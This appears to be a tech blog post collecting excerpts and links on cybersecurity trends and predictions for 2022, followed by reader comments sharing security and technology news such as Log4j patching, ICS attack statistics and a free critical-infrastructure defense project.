Nothing is more difficult than making predictions. Instead of trowing out wild ideas what might be coming, I have collected here some trends other people have predicted or reported.
Why the Future Needs Passwordless Authentication
https://securityintelligence.com/future-needs-passwordless-authentication/
As of September, Microsoft users no longer have to rely on passwords when logging in to their accounts. Passwords were suitable for authentication when users had fewer accounts, but things have changed.
Nowadays, everyone’s digital footprint is larger, making passwords more of a burden than a security necessity.
Cyber Warfare: What To Expect in 2022
https://securityintelligence.com/articles/cyber-warfare-what-to-expect-2022/
Cyberwarfare is not a future threatit’s a clear and present danger.
While the concept of cyber terrorism might sound like something from a fictional movie, our interconnected world is riddled with security flaws that make it an unfortunate reality. Read on as we cover seven cyber warfare and cybersecurity threats to watch out for in 2022.
Prediction Season: What’s in Store for Cybersecurity in 2022?
https://www.securityweek.com/prediction-season-whats-store-cybersecurity-2022
The past year has been quite challenging and tiring for many IT and security professionals, as threat actors capitalized on the rapidly changing environment created by accelerated digitalization and cloud transformation in response to the COVID-19 pandemic. And while we all hope that the next year is better when it comes to the onslaught of daily phishing, ransomware, and credential stuffing attacks; cyber criminals will likely learn from this year’s successful tactics, retool, and pivot them into next year’s campaigns to wreak even more havoc in all lives.
Consider the following threats that are on the horizon in 2022 and start preparing for them now:
Compromised Identities Continue to Fuel the Cyberattack Engine
Ransomware Attacks Evolve to Multifaceted Extortion Schemes
Pay Attention to the Supply Chain Threats
The Work from Anywhere Era Creates New Threats
“AI and ML will be an enabler for cybersecurity for the foreseeable future”
https://cisomag.eccouncil.org/ai-and-ml-will-be-an-enabler-for-cybersecurity-for-the-foreseeable-future/
We are proceeding in an era of “Malthusian” advances in science and technology, enabled by faster computing and ever-expanding data analytics. Those emerging technologies are significantly impacting cybersecurity. They include artificial intelligence (AI), machine learning, high-performance computing, cloud, edge computing, 5G, and eventually quantum technologies.
Computing systems that employ AI and ML are becoming more pervasive and critical to cyber operations and have become a major focus of cybersecurity research development and investments. Advanced 5G and wireless networks will benefit higher traffic capacities, lower latency, increased reliability, and enable processing and analytics in real-time. Edge computing strives to bring real-time computation, data storage, and operations closer to the device, rather than relying on a central location, avoiding latency issues. Technologies that improve capabilities for discovering, categorizing, monitoring, synthesizing, and automating the analysis of data are advantages in mitigating cybersecurity threats. Specifically, such tech can be used to bolster botnet detection and mitigation technology, data visualization tools, active malware protection, rootkit detection and mitigation technology, and incident response analytics.
Emerging tech can be a two-way street for good and bad. Artificial intelligence and machine learning can be used by hackers to automate target selection and more. Threat actors, especially state-sponsored and criminal enterprises, are becoming more sophisticated by searching for vulnerabilities and infiltrating malware by adapting (and automating), enabling machine learning, deep learning, artificial intelligence, and other analytic tools.
Also, the emergence of the Internet of Things presents special security challenges. There are an estimated 44 billion IoT endpoints today and trillions of sensors connected to those endpoints. Hackers have many attack options and entries for inserting malware into such a large and unregulated attack surface.
Google Finds 35,863 Java Packages Using Defective Log4j
https://www.securityweek.com/google-finds-35863-java-packages-using-defective-log4j
The computer security industry is bracing for travel on long, bumpy roads littered with Log4j security problems as experts warn that software dependency patching hiccups will slow global mitigation efforts.
The sheer scale and impact of the crisis became a bit clearer this week with Google’s open-source team reporting that a whopping 35,863 Java packages in Maven Central are still using defective versions of Log4j library.
The vulnerability, flagged as CVE-2021-44228, was first discovered and reported by the Alibaba cloud security team on November 24 this year. Less than two weeks later, exploitation was spotted in the wild, prompting the release of multiple high-priority patches and an industry-wide scramble to apply practical mitigations.
Many actors have exploited the critical Apache Log4j vulnerability named Log4Shell to infect vulnerable devices. Apache has released several Log4j versions to fix the original Log4j vulnerability (CVE-2021-44228) and newer findings on the same software (CVE-2021-44832, CVE-2021-45046, CVE-2021-45105, CVE-2021-42550).
Threat Intelligence on Log4j CVE: Key Findings and Their Implications
https://www.akamai.com/blog/security/threat-intelligence-on-log4j-cve-key-findings-and-their-implications
Expect this vulnerability to have a long attack tail. We anticipate that due to how widely used this software is and the large number of exploit variations, we will continue to see exploit attempts for months to come and expect many breaches will get uncovered going forward.
Attackers used opportunistic injections and became more targeted. Consequences of the reconnaissance may not be fully understood for months. While the attacks can be mitigated by patching and other methods, it’s unclear how many breaches have happened already. It will take time for the breaches to come to light and for us to understand their magnitude.
Ransomware in 2022: We’re all screwed
https://www.zdnet.com/article/ransomware-in-2022-were-all-screwed/
Over the past few years, we’ve seen ransomware operators evolve from disorganized splinter groups and individuals to highly sophisticated operations, with separate teams collaborating to target everything from SMBs to software supply chains. Ransomware infection is no longer an end goal of a cyberattack. We are experiencing the “golden era of ransomware,” now in part due to multiple monetization options.
Burnout: The next great security threat at work
https://blog.1password.com/state-of-access-report-burnout-breach/
Many companies feel like they’ve successfully pivoted to remote and hybrid work. Team members have learned the tools and processes required to be successful outside the office, and IT departments have adjusted their security rules and policies accordingly. But now, nearly two years into the pandemic, another cybersecurity threat has
emerged: employee burnout.
In 2022, security will be Linux and open-source developers job number one
https://www.zdnet.com/article/in-2022-security-will-be-linux-and-open-source-developers-job-number-one/
Linux is everywhere. It’s what all the clouds, even Microsoft Azure, run. It’s what makes all 500 of the Top 500 supercomputers work. Heck, even desktop Linux is growing if you can believe Pornhub, which claims Linux users grew by 28%, while Windows users declined by 3%. Its real trouble isn’t so much with open-source itself. There’s nothing magical about open-source methodology and security. Security mistakes can still enter the code. Linus’s law is that given enough eyeballs, all bugs are shallow. But, if not enough developers are looking, security vulnerabilities will still go unnoticed. As what I’m now calling Schneier’s law, “Security is a process, not a product, ” points out constant vigilance is needed to secure all software.
The future of OT security in an IT-OT converged world
https://www.theregister.com/2021/11/09/securing_ics_in_the_cloud/
Securing ICS in the cloud requires ‘fundamentally different’ approach
If you thought the industrial internet of things (IIoT) was the cutting edge of industrial control systems, think again. Companies have been busy allowing external access to sensors and controllers in factories and utilities for a while now, but forward-thinking firms are now exploring a new development; operating their industrial control systems (ICS) entirely from the cloud. That raises a critical question: who’s going to protect it all?
Dave Masson, Director of Enterprise Security at Darktrace, calls this new trend ‘ICSaaS’. “ICS for the cloud is starting to happen now. That represents a whole new world for industrial technology and security.”
This trend has been possible for the last decade or so, he explains, but the uptake has been slow. Now, Masson is hearing from clients who are actioning it.
Operational technology admins may be nervous about allowing cloud-based control of their infrastructures, but they’re attracted by the potential benefits. If operators are accessing ICS remotely anyway, then it makes it easier to consider cloud-based interfaces. These make the management infrastructure cheaper and easier to operate.
In this scenario, the hardware components that make up ICS stay where they are. We’re not talking about virtualizing programmable logic controllers here. It’s the data governing their operation that moves to the cloud. That means the applications, databases, and other services that operators rely on to keep those components running smoothly.
Security is just as important in these new cloud-enabled environments as it was in the old legacy walled gardens, but the challenges facing defenders are different. The cloud is eroding the gap between IT and OT. OT is now part of what looks increasingly like a common IT network.
“Now, anybody can access this network from anywhere, so you’ve got to make sure you have good controls around who’s got permission”
“This raises questions about data security, compliance, and regulation.”
OT admins, used to maintaining an iron grip on their infrastructure, now risk a loss of visibility and control. There are organizational worries to consider beyond the technological ones. Converging IT/OT infrastructures is only part of the story. You must also decide who is managing security for the expanded network. Is it the IT security team, or the OT team, or both?
Zero trust architecture is a common talking point today when discussing cloud-based security, and that will be important. ICSaaS is only one part of a broader shift towards OT/IT convergence. The advent of 5G, along with the development of edge computing, will accelerate the trend still further.
Sophos 2022 Threat Report: Malware, Mobile, Machine learning and more!
https://nakedsecurity.sophos.com/2021/11/09/2022-threat-report/
we’ve covered five main topics: 1 Malware, 2 Mobile, 3 Machine Learning and AI, 4 Ransomware (because we simply couldn’t not give it a section of its own), and 5 Where next?. PDF:
https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2022-threat-report.pdf
“AI and ML will be an enabler for cybersecurity for the foreseeable future”
https://cisomag.eccouncil.org/ai-and-ml-will-be-an-enabler-for-cybersecurity-for-the-foreseeable-future/
What are some of the emerging technologies in security? Would these generate opportunities and create challenges?
Critical Infrastructure (CI) and supply chain will be targeted even more in 2022 (state-sponsored, cybercriminal gangs) with ransomware and malware attacks.
• Investment and risk strategies will expand in conducting vulnerability assessments and filling operational gaps with cybersecurity tools. Tools include Data Loss Prevention (DLP), encryption, identity and access management solutions, log management, and SIEM platforms.
• Despite efforts to attract workers to security and tech jobs, the qualified cybersecurity worker shortage will continue to pose major operational challenges. Both the public and private sectors are currently facing challenges from a dearth of cybersecurity talent. A report out from the firm Cybersecurity Ventures estimates there are 3.5 million unfilled cybersecurity jobs in 2021. 2022 is not showing any signs of improvement in hiring.
• The Internet of Things (IoT) will pose a growing cybersecurity risk. IoT’s exponential connectivity is an ever-expanding mesh of networks and devices.
There are some specific areas where AI technology will contribute to making cybersecurity smarter include:
• AI can provide a faster means to detect and identify cyberthreats. Cybersecurity companies will be using software and a platform powered by AI that monitors real-time activities on the network by scanning data and files to recognize unauthorized communication attempts, unauthorized connections, abnormal/malicious credential use, brute force login attempts, unusual data movement, and data exfiltration. This allows businesses to draw statistical inferences and protect against anomalies before they are reported and patched.
• AI will impact Incident Diagnosis and Response capabilities.
While descriptive analytics provided by network surveillance and threat detection tools can answer the question “what happened,” incident diagnosis analytics address the question of “why and how it happened.” To answer those questions, new software applications and platforms powered by AI can examine past data sets to find root causes of the incident by looking back at change and anomaly indicators in the network activities
• AI will also enable better cyberthreat intelligence reports by analysts. Next year analysts will be able to use AI tools to generate automated cyberthreat intelligence reports (CTI). Cyberthreat intelligence reports provide the indicators and early warning necessary to better monitor unusual activities on a given network and detect more rapidly cyber threats.
AI and ML will be an enabler for cybersecurity for the foreseeable future. AI-powered tools and automation enablement will play an increased and integral role in keeping us cyber-safe in 2022 and beyond.
Kännyköiden tietoturva menee uusiksi
https://etn.fi/index.php/13-news/12788-kaennykoeiden-tietoturva-menee-uusiksi
In smartphones, security has been in place for more than a decade, with trusted processing performed in the TEE (Trusted Execution Environment) section of device memory. The current standard solution for smartphone security is typically created with Arm’s TrustZone technology. The phone’s own security comes from TEE. A secure boot usually includes a TEE. TEE has been an elegant solution for smartphones, although it is becoming old-fashioned (Arm TrustZone was developed 15 years ago).
The memory required by the TEE has not been available in the small controller chips used for embedded applications. Manufacturers have promoted Safe Boot and Memory Encryption or Flash Encryption, but they have been pretty weak solutions. Recently, Arm’s TrustZone M has introduced a new security model for controllers.
In recent years, this picture has begun to diversify. A revolution is underway now. Google has launched a keystone technology that allows an application to generate a system-maintained key and authenticate services (still uses TEE).
In the future, for example, encryption keys will be stored in an isolated memory area, an enclave, says Jan-Erik Ekberg, head of Huawei’s HSSL laboratory (Helsinki System Security Lab). Five years ago, Intel introduced SGX technology for PC servers, which simply means security extension commands added to the CPU chip. In this solution, TEE type protections are provided by a secure enclave. The use of this type of security enclave needs less code than traditional TEE structure. An enclave is a temporary structure in the memory of a device. It is created only for security processes and exits when it has completed its task. The difference is significant in the TEE structure, where another kernel runs all the time alongside the operating system. When there is no other parallel kernel, there is one component less to attack.
In Intel’s SGX, enclaves were implemented through caching, which limited their use. Intel has sought to overcome this limitation with newer TDX (Trust Domain Extensions) technology. AMD aims to do the same with its own SEV (Secure Encrypted Virtualization) technology.
Enclave-style solution structure will also come in the smart phones. The new Armv9-A architecture last year offers a realm mode that is very close to the technologies offered on the server side (Intel SGX). With the coming enclaves, an infinite number of secured environments will be available in principle.
In the mobile ecosystem, TEE is so deeply rooted that the transition will probably take five years. During the transition period TEE and more dynamic solutions will be on the market in parallel.
Kyberhyökkäykset uhkaavat jo tavarantoimituksiakin
https://www.uusiteknologia.fi/2021/11/08/kyberhyokkaykset-uhkaavat-jo-tavarantoimituksiakin/
Cyber attacks will cause chaos in product supply chains in the future, estimates Japanese security firm Trend Micro in its latest report. They can also cause physical harm to people, so it’s not just about problems with production or distribution.
According to Trend Micro, network connectivity by 2030 will affect our everyday lives even more, both physically and mentally. At the same time, cyber threats are constantly evolving and abusing technological innovation in ever new ways.
Artificial intelligence tools democratize cybercrime from technically savvy individuals and criminal organizations to all. The new “Everything as a Service” service model also makes cloud service providers very attractive targets for cyber attackers.
Massive IoT (MIoT) environments in industrial facilities, logistics centers, transportation systems, healthcare, education, commerce, and homes are attractive targets for saboteurs and blackmailers. The new 5G and subsequent 6G networks are also making attacks more sophisticated and targeted.
In the future, user manipulation and fake news will become increasingly important and difficult to ignore when fed to smart glasses. Reality can be badly distorted.
https://resources.trendmicro.com/rs/945-CXD-062/images/WP01_Project%202030_White%20Paper_210505US_Web.pdf
Jarno Limnéll varoittaa “kyberpandemiasta” internetin häiriö voi panna maailman taas sekaisin
https://www.tivi.fi/uutiset/tv/211df5c9-7909-47b7-842b-719f6a496206
Cyber harassment and sports doping have a lot in common. Tracing and testing methods are evolving, but so are scams. And scammers always seem to be one step ahead. Sometimes they are only revealed years later. “The world is moving in the direction that technology is evolving faster and faster, and rather increasing the possibility of various disruptions and creating new types of vulnerabilities. There is no seamless security,” Limnagl says. So even with technology, the world will not be completed. In addition, crises always come as a surprise: New York on September 11, the Bosnian war, Hitler’s rise to power, the shots in Sarajevo. “In light of history, we’re always surprised. And if you think about it, technology only adds to the complexity and surprise of crises.”
Kyberhyökkäykset kiihtyvät, mutta yritykset voivat vastata niihin
https://etn.fi/index.php/new-products/13-news/12920-kyberhyoekkaeykset-kiihtyvaet-mutta-yritykset-voivat-vastata-niihin
Cyber attacks are accelerating, but companies can respond to them A new study by security firm Trend Micro predicts that the number of cyber attacks will increase, with a particular focus on IoT devices. At the same time in 2022 global organizations will be more vigilant and better prepared to face new cyber threats. Research, foresight, and automation are critical to risk management and employee protection. The shift of workers to telecommuting has opened up new avenues for attackers, so the attack area of companies and organizations has grown exponentially. Fortunately, hybrid work is becoming more established and more predictable, allowing security decision-makers to plan and refine their security strategies. Those are:
• Enhanced server security and application management policies to combat blackmail
• A risk-based update plan and an effort to detect security vulnerabilities in advance
• Improved basic protection for SMEs using cloud services
• Active network monitoring, especially in IoT environments
• Zero Trust security model to secure international supply chains
• Cloud security focused on the risks assessed by the DevOps team and industry best practices
• Advanced Detection and Response (XDR) model to detect attacks on large networks
Trend Micron raportti: tulevaisuudessa kaikki on vaarassa
https://etn.fi/index.php/13-news/12785-trend-micro-raportti-tulevaisuudessa-kaikki-on-vaarassa
Security company Trend Micro has released its 2030 future report. Videos also tell us what the world could look like at the beginning of the next decade. From the perspective of cyber threats and cybersecurity, the future looks bleak. By 2030, connectivity, or continuous online presence, will affect our daily lives on both a physical and mental level. At the same time, cyber threats are constantly evolving and abusing technological innovation in ever new ways.
Trend Micro hopes that this review will spark debate both within the security industry and in society at large. We can only prepare for the cyber challenges of the next decade by comprehensively anticipating all possible situations and advising how governments, the business world and individuals can prepare for them.
Project 2030
https://2030.trendmicro.com/?utm_campaign=ADC2021_Corporate_2030_Predictions&utm_medium=Press-Release&utm_source=Press-Release_Glimpse-into-future_PR&utm_content=Watch-video
Welcome to your new reality, more connected than ever to all the riches modern life has to offer, yet where truth has never been more insubstantial.
3,062 Comments
Tomi Engdahl says:
TikTok Was Designed for War
As Russia’s invasion of Ukraine plays out online, the platform’s design and algorithm prove ideal for the messiness of war—but a nightmare for the truth.
https://www.wired.com/story/ukraine-russia-war-tiktok/#intcid=_wired-bottom-recirc_8e802014-a05f-48c5-89e8-9dad931361ad_text2vec1-reranked-by-vidi
Tomi Engdahl says:
Russia’s War in Ukraine Could Spur Another Global Chip Shortage
Ukraine is home to half of the world’s neon gas, which is critical for manufacturing semiconductor chips.
https://www.wired.com/story/ukraine-chip-shortage-neon/#intcid=_wired-bottom-recirc_8e802014-a05f-48c5-89e8-9dad931361ad_text2vec1-reranked-by-vidi
On Thursday morning, explosions rocked at least seven cities in Ukraine, heralding the start of a full-scale Russian invasion. Among Putin’s first targets was Odesa, a seaside city huddled around the Black Sea, and one of the country’s busiest ports. But it is also home to a little-known company called Cryoin, which plays a big role in the global production of semiconductors.
Cryoin makes neon gas, a substance used to power the lasers that etch patterns into computer chips. It supplies companies in Europe, Japan, Korea, China, and Taiwan, but most of its neon is shipped to the US, the company told WIRED. Now analysts are warning that the ripple effects caused by disruption to Cryoin’s supply could be felt around the world.
Cryoin’s production of neon and other gases ground to a halt on Thursday as the invasion began, says business development director Larissa Bondarenko. “We decided that [our employees] should stay at home for the next couple of days until the situation is clearer, to make sure that everyone is safe,” she says, adding there was no damage to the facility as of Monday. Despite plans to restart production over the weekend, missiles over Odesa meant it was still too dangerous. Bondarenko, who lives half an hour away from the site by car, says she has been sleeping in her basement. “Thank God we have one in our house.”
But Russian aggression in Ukraine is making the industry nervous that these shortages could be intensified by a repeat of 2014, when prices for neon gas spiked by 600 per cent in response to the annexation of Crimea. Last week, US and Japanese governments were scrambling to make sure that will not happen again, pressuring their chip industries to find alternative sources of this obscure gas before it’s too late.
Ukraine is just one of a series of choke points in the global semiconductor industry. Around half of the world’s neon gas comes from the country, TechCet, an electronic materials advisory firm which advises some of the world’s biggest chipmakers including Intel and Samsung, told WIRED.
Ukraine’s neon industry was built to take advantage of the gases produced as byproducts of Russian steel manufacturing. “What happens in Russia is that those [steel] companies that have the facility to capture the gas will bottle it and sell it as crude,” says Lita Shon-Roy, president and CEO of TechCet. “Then someone has to purify it and take out the other [gases] and that’s where Cryoin comes in.”
Tomi Engdahl says:
Slight Increase in Attacks on ICS Computers in 2021: Report
https://www.securityweek.com/slight-increase-attacks-ics-computers-2021-report
Kaspersky said it saw only a small increase in the percentage of industrial control system (ICS) computers targeted in 2021 compared to the previous year, but there was a more significant rise for certain types of threats.
Overall, Kaspersky blocked “malicious objects” on 39.6% of the ICS computers protected by its products, up from 38.6% in 2020. On the other hand, in the second half of 2021, the company observed attacks only against 31.4% of devices, the smallest of any six-month period since the start of 2020.
However, there were certain types of threats where the number of detections has been on an upwards trend in the past two years. This includes spyware (blocked on over 8.1% of devices compared to 5.6% in H1 2020), malicious scripts and phishing pages (9.3% up from 6.5%), and cryptocurrency miners (2.1% up from 0.9%).
In North America, nearly 20% of systems were targeted, roughly the same as in Western Europe, Kaspersky’s report shows. In comparison, the percentage of targeted systems exceeded 40% in many parts of Asia and even 50% in Africa and Southeast Asia.
The cybersecurity firm’s solutions blocked roughly 5,000 malware families and 20,000 malware variants on industrial systems in both the first and the second half of 2021. In terms of variants, this is roughly the same as in the previous two years. However, in terms of malware families, while there was no significant change in 2021 compared to 2020, the numbers are roughly double compared to 2019.
Tomi Engdahl says:
Tens of Cybersecurity Firms Found Exposing Their Assets: Study
https://www.securityweek.com/tens-cybersecurity-firms-found-exposing-their-assets-study
Tens of cybersecurity companies expose a large number of assets to the internet, according to a study conducted recently by attack surface management firm Reposify.
It’s not uncommon for major companies to unwittingly expose databases and other assets, but a study conducted by Reposify over a two-week period in January showed that 35 multinational cybersecurity companies and their more than 350 subsidiaries hosted over 200,000 exposed assets. These assets included databases, remote access sites, and cloud services.
Reposify’s analysis showed that 86% of these companies have at least one exposed remote access service, 80% expose network assets, and 63% expose back office internal networks. Just over half of the cybersecurity firms have at least one exposed database.
In a vast majority of cases, companies exposed platforms such as Nginx, Apache, OpenSSH, IIS and Portmap, which are “highly sensitive, and the consequence of a breach is severe — particularly in the case of the cybersecurity industry.”
As for exposed remote access protocols, 90% of companies exposed OpenSSH, followed by RDP (47%), Telnet (33%), and SMB (30%).
The study showed that more than two-thirds of companies exposed PostgreSQL databases, and half exposed Oracledb databases.
Many cybersecurity firms and their subsidiaries also appear to expose storage and backup systems (FTP, S3), and development tools (Express, Jenkins, Tableau Server).
Nearly every cybersecurity company seems to host exposed assets on the AWS cloud platform (97%), followed by Azure (82%) and Google Cloud (76%).
One concerning finding is that — except for storage and web assets — a majority of exposed services are in the organization’s “unofficial perimeter,” which means they are less likely to be monitored.
“Services under unknown perimeters are less likely to be known, and often represent shadow IT, unknown risks, or flag a possible backdoor malactors can use to access a company’s assets,” Reposify said in its report.
https://go.reposify.com/hubfs/Reposify_Cybersecurity_Report_2022.pdf
Tomi Engdahl says:
CISA’s Zero Trust Guidance for Enterprise Mobility Available for Public Comment https://www.cisa.gov/uscert/ncas/current-activity/2022/03/07/cisas-zero-trust-guidance-enterprise-mobility-available-public
CISA has released a draft version of Applying Zero Trust Principles to Enterprise Mobility for public comment. The paper guides federal agencies as they evolve and operationalize cybersecurity programs and capabilities, including cybersecurity for mobility. The public comment period will close April 18, 2022. Executive Order 14028: Improving the Nation’s Cybersecurity, issued May 12, 2021, requires Federal Civilian Executive Branch departments and agencies to adopt Zero Trust (ZT) architectures to protect the government’s information resources, of which federal mobility is an integral part.
Tomi Engdahl says:
U.S. Security Vendors Launch Critical Infrastructure Defense Project
https://www.securityweek.com/us-security-vendors-launch-critical-infrastructure-defense-project
Amid rising Russia tensions, Cloudflare, CrowdStrike and Ping Identity offer free security for Critical National Infrastructure operators
Government warnings of heightened cyber risk to U.S. organizations as a by-product of the war in Ukraine are almost a daily occurrence. The government considers increased cyber activity aimed at U.S. and NATO organizations ‒ and particularly critical infrastructure organizations ‒ to be a serious threat.
CISA has a ‘Shields Up’ page that states, “While there are no specific or credible cyber threats to the U.S. homeland at this time, Russia’s unprovoked attack on Ukraine, which has involved cyber-attacks on Ukrainian government and critical infrastructure organizations, may impact organizations both within and beyond the region. Every organization—large and small—must be prepared to respond to disruptive cyber activity.”
You can see SecurityWeek’s take on how and why cyber threats could escalate from Ukraine into a formal or informal cyberwar here: Russia-Ukraine: Threat of Local Cyber Operations Escalating Into Global Cyberwar. Failing the rapid withdrawal of Russian troops from Ukraine, which doesn’t seem likely, it is difficult to see anything other than increased cyber activity aimed against the U.S. and its allies.
Tomi Engdahl says:
Jamie Crawley / CoinDesk:
The EU Parliament will vote on crypto rules on March 14, after the removal of wording that would have banned proof-of-work cryptocurrencies over energy concerns
EU Parliament Monetary Committee to Vote on MiCA Next Week
Wording that would have banned proof-of-work cryptos like bitcoin has been removed.
https://www.coindesk.com/policy/2022/03/07/eu-parliament-monetary-committee-to-vote-on-mica-next-week/
After having previously been postponed thanks to an outcry over language amounting to a “de facto” ban on Bitcoin, a vote by the Monetary Committee of the European Union’s parliament on the EU’s Markets in Crypto Assets (MiCA) legislation will take place on March 14.
The news was tweeted out minutes ago by Dr. Stefan Berger, the member of parliament in charge of shepherding MiCA through parliament.
“An independent topic of proof-of-work is no longer provided in the MiCA,” Berger told CoinDesk, confirming his promise to remove language he had previously called a “de facto” ban on Bitcoin.
“My suggestion is to include crypto assets, like all other financial products, in the taxonomy area,” Berger today added. “In view of the controversial discussions surrounding the energy consumption of crypto assets, the taxonomy could provide clarity and ensure a better information basis for consumers.”
“Strong support for MiCA is a strong signal from the EU Parliament for a technology-neutral and innovation-friendly financial sector,” he concluded.
The Case for Taxing Proof-of-Work
https://www.coindesk.com/layer2/taxweek/2022/02/24/the-case-for-taxing-proof-of-work/
Most bitcoin owners aren’t cypherpunks and don’t require an energy-intensive consensus mechanism. A tax would shift them on to sensible alternatives. This post is part of CoinDesk’s Tax Week.
Tomi Engdahl says:
Low-Cost, Two-Channel Scriptable Waveform Generator
https://hackaday.com/2022/03/05/low-cost-two-channel-scriptable-waveform-generator/
Microcontroller addict [Debraj] decided to make his own programmable sine wave generator, and was able to put it together for under $40 USD. Other than low-cost, his list of requirements was as follows:
Dual sine wave output, synchronized
Frequency, Amplitude, and Phase control
Low harmonics under 1 MHz
Scriptable via Python
The heart of the project is the Analog Devices AD9833, a complete Direct Digital Synthesis (DDS) waveform generator system on a chip. If you’ve ever rolled your own DDS using discrete ICs or in an FPGA, you can appreciate the benefit of squeezing the phase accumulator, sine lookup table, DAC, and control logic all into a single ten-pin package. [Debraj] uses AD9833 modules from the usual online vendors for a few dollars each. He synchronizes the generators by disconnecting the reference crystal on the second module and driving it from the first one. The remaining specifications are met by the inherent characteristics of the DDS system, and the scriptable interface is accomplished with an Arduino controlling the AD9833 chips and two programmable gain amplifiers (MCP6S31). We like the confidence that [Debraj] displays by sketching the initial circuit diagram with a ball-point pen — check out the sketch and the final pictorial schematic in the video below the break.
Low Cost DYI Dual Sine Wave generator
https://www.youtube.com/watch?v=ODtvqU939jw
1. Low Cost DYI Dual Sine Wave generator
2. Programmable frequency, phase and amplitude
3. Frequency (low harmonics) from 1Hz to 1MHz
4. Phase 0 deg to 360 deg
5. 7 step amplitude change.
6. Simple commands, which can be sent via terminal program of python script.
7. Applications — Quadrature Amplitude modulation, DSP (filters, FFT), PLL, arctan algorithm validation, Clarke-Park Transfor and many more.
Tomi Engdahl says:
How Everything We’re Told About Website Identity Assurance is Wrong
https://www.troyhunt.com/how-everything-were-told-about-website-identity-assurance-is-wrong/
I have a vehement dislike for misleading advertising. We see it every day; weight loss pills, make money fast schemes and if you travel in the same circles I do, claims that extended validation (EV) certificates actually do something useful
Someone had reached out to me privately and shared the offending page as they’d taken issue with the false claims DigiCert was making. My views on certificate authority shenanigans spinning yarns on EV are well known after having done many talks on the topic and written many blog posts, most recently in August 2019 after both Chrome and Firefox announced they were killing it. When I say “kill”, that never meant that EV would no longer technically work, but it killed the single thing spruikers of it relied upon – being visually present beside the address bar. That was 2 and a half years ago, so why is DigiCert still pimping the message about the green bar with the company name? Beats me (although I could gue$$), but clearly DigiCert had a change of heart after that tweet because a day later, the offending image was gon
Tomi Engdahl says:
Duncan Riley / SiliconANGLE:
Cloudflare, CrowdStrike, and Ping Identity form the Critical Infrastructure Defense Project, offering their services to US hospitals and utilities for free — Cloudflare Inc., CrowdStrike Holdings Inc. and Ping Identity Corp. today are teaming up to form the Critical Infrastructure Defense Project …
Cloudflare, CrowdStrike and Ping Identity to provide free cybersecurity to vulnerable industries
https://siliconangle.com/2022/03/07/cloudflare-cloudstrike-ping-identity-provide-free-cybersecurity-vulnerable-industries/
Cloudflare Inc., CrowdStrike Holdings Inc. and Ping Identity Corp. today are teaming up to form the Critical Infrastructure Defense Project, a project that will provide free cybersecurity services to vulnerable industries.
The project is designed to enhance defenses against critical areas of enterprise risk. Under the project, eligible organizations will have access to the full suite of Cloudflare zero-trust security solutions, endpoint protection and intelligence services from CrowdStrike and zero-trust identity solutions from Ping Identity.
In addition, in collaboration with core partners across the public sector, the project will also offer an easy-to-follow roadmap that businesses in any industry can use to implement step-by-step security measures to defend themselves from cyberattacks.
https://criticalinfrastructuredefense.org/
Tomi Engdahl says:
Duncan Riley / SiliconANGLE:
Cloudflare, CrowdStrike, and Ping Identity form the Critical Infrastructure Defense Project, offering their services to US hospitals and utilities for free
Cloudflare, CrowdStrike and Ping Identity to provide free cybersecurity to vulnerable industries
https://siliconangle.com/2022/03/07/cloudflare-cloudstrike-ping-identity-provide-free-cybersecurity-vulnerable-industries/
Cloudflare Inc., CrowdStrike Holdings Inc. and Ping Identity Corp. today are teaming up to form the Critical Infrastructure Defense Project, a project that will provide free cybersecurity services to vulnerable industries.
The project is designed to enhance defenses against critical areas of enterprise risk. Under the project, eligible organizations will have access to the full suite of Cloudflare zero-trust security solutions, endpoint protection and intelligence services from CrowdStrike and zero-trust identity solutions from Ping Identity.
The security features available to organizations through the Critical Infrastructure Defense Project provide a zero-trust model for securing networks, endpoints and identities of organizations and critical threat intelligence for teams at risk of attack. Hospitals and water and power utilities in the U.S. are encouraged to apply to be part of the program.
The timing of the project comes as the Russian invasion of Ukraine continues and, alongside that, a rise in hacking and cyberattacks. The Department of Homeland Security’s Cybersecurity and Infrastructure Agency has issued multiple warnings about Russia targeting businesses.
Last month, CISA warned that Russian state-sponsored cyber actors were targeting defense contractors. In January, CISA warned that Russia could launch cyberattacks against the U.S. government and critical infrastructure operators ahead of the Ukraine invasion.
“We rely on our infrastructure to power our homes, to provide access to water and basic necessities and to maintain critical access to healthcare,” Matthew Prince, co-founder and chief executive officer of Cloudflare, said in a statement. “That’s why it’s more important than ever for the security industry to band together and ensure that our most critical industries are protected and prepared.”
Tomi Engdahl says:
Webinar Today: Protect the Software Supply Chain, Eliminate Risks in Code
https://www.securityweek.com/webinar-today-protect-software-supply-chain-eliminate-risks-code
Software supply chain attacks have become a boardroom topic as organizations grapple with growing cyberattacks and skyrocketing costs of remediation.
Please join SecurityWeek and BluBracket on Tuesday, March 8, 2022 at 1:00PM ET for an exclusive webinar: Eliminate Risks in Code, Protect the Software Supply Chain.
Developers and security professionals can benefit from this webinar and hear from DevSecOps experts on how leading organizations are shifting left, utilizing new techniques to identify and mitigate risks without slowing down the process.
Key takeaways from this webinar:
● Discover how to detect secrets in code and rectify other critical code related risks.
● Uncover new techniques that protect code in both internal and external repositories.
● Learn about the latest code security tools that support AppSec programs, integrate with existing developer workflows and even secure Git and infrastructure configurations.
Tomi Engdahl says:
Kyberturvallisuuden varautuminen tehdään hyvän sään aikaan – ohje organisaatioille https://www.kyberturvallisuuskeskus.fi/fi/ajankohtaista/kyberturvallisuuden-varautuminen-tehdaan-hyvan-saan-aikaan-ohje-organisaatioille
Suomessa kyberturvallisuuden tilanne on tällä hetkellä vakaa.
Viestintäverkot toimivat normaalisti ja teleyrityksillä on pitkä kokemus varautumisesta. Kiristyneen kansainvälisen tilanteen mahdolliset tietoturvaan kohdistuvat heijastevaikutukset askarruttavat nyt monia organisaatioita. Hyvin järjestetty tietoturvan perusta on investointi organisaation toiminnan jatkuvuuden turvaamiseksi joka päivä. Varautuminen on syytä tehdä ennen poikkeavia tilanteita.
“Esimerkiksi lähes kaikki tähän mennessä Ukrainassa viimeisen kymmenen vuoden aikana nähdyt kybertapahtumat on nähty, koettu ja torjuttu myös Suomessa. Tämä on osoitus Suomen kyberturvallisuuden osaamisesta ja varautumisen tasosta”,. sanoo johtaja Arttu Lehmuskallio Liikenne- ja viestintävirasto Traficomin Kyberturvallisuuskeskuksesta. Ohje:
https://www.kyberturvallisuuskeskus.fi/fi/kyberturvallisuuden-vahvistaminen-suomalaisissa-organisaatiossa-ohje-johdolle-ja-asiantuntijoille
Tomi Engdahl says:
